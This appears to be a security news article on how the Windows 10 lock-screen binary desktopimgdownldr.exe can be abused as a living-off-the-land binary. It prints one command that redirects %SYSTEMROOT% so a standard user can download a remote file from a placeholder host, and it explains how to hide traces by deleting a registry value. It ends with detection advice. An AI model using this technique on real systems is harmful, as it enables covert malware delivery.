A Windows 10 binary responsible for setting the desktop and lock screen image can help attackers download malware onto a compromised system without raising the alarm.
Known as living-off-the-land binaries (LoLBins), such files ship with the operating system and have a legitimate purpose. Attackers of all stripes abuse them in the post-exploitation phase to blend malicious activity in with normal system behavior.
The new LoL in the Bin
An attacker can use LoLBins to download and install malware and to bypass security controls such as User Account Control (UAC) or Windows Defender Application Control (WDAC). Typically, the attack combines fileless malware with reputable cloud services.
A list of 13 Windows native executables that can download and execute malicious code:
desktopimgdownldr.exe is part of the Personalization CSP (configuration service provider), which lets administrators define, among other settings, the lock screen and desktop background images.
Both settings accept JPG, JPEG and PNG files stored either locally or remotely; HTTP and HTTPS URLs are supported.
Running desktopimgdownldr.exe with administrator privileges replaces the user-defined lock screen image, a visible change that could tip the user off that something is wrong.
The attacker can avoid this by deleting a registry value immediately after running the binary, leaving the user none the wiser.
Although the executable appears to require administrator privileges, since it creates files under C:\Windows and writes to the registry, it can also be run as a standard user to download a file from an external source.
This works by changing the value of the %SYSTEMROOT% environment variable before launching the binary, which redirects the download destination and sidesteps the access checks on the real Windows directory.
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Without administrator rights, writing to the registry is not possible, so the lock screen image remains unchanged. In this scenario, the method leaves no artifacts other than the downloaded file.
The executable uses the BITS COM object to download the file, and on some machines it tries to locate the COM+ Registration Catalog under %SYSTEMROOT%. Because the attacker has pointed that variable elsewhere, the lookup fails.
Users of Endpoint Detection and Response (EDR) solutions should add "desktopimgdownldr.exe" to their queries and watchlists and treat it just like "certutil.exe," a LoLBin widely used both by advanced hackers doing a government's bidding and by cybercriminals set on scoring big money.